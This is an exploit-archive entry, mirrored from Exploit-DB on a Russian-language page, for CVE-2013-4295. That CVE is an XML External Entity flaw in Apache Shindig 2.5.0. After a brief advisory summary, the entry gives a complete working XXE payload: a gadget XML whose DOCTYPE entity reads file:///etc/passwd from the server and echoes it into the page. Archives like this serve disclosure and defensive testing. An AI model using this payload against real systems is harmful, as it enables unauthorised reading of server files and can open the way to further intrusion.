- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 38813
- Проверка EDB
-
- Пройдено
- Автор
- KOUSUKE EBIHARA
- Тип уязвимости
- REMOTE
- Платформа
- MULTIPLE
- CVE
- cve-2013-4295
- Дата публикации
- 2013-10-21
Apache Shindig - XML External Entity Information Disclosure
Код:
source: https://www.securityfocus.com/bid/63260/info
Apache Shindig is prone to an information-disclosure vulnerability.
An attacker can exploit this issue to gain access to sensitive information; this may lead to further attacks.
Apache Shindig 2.5.0 is vulnerable.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE Module [ <!ENTITY passwd SYSTEM "file:///etc/passwd"> ]> <Module>
<ModulePrefs title="Test Application"> <Require feature="opensocial-0.9" />
</ModulePrefs> <Content type="html"> &passwd; hello </Content> </Module>
- Источник
- www.exploit-db.com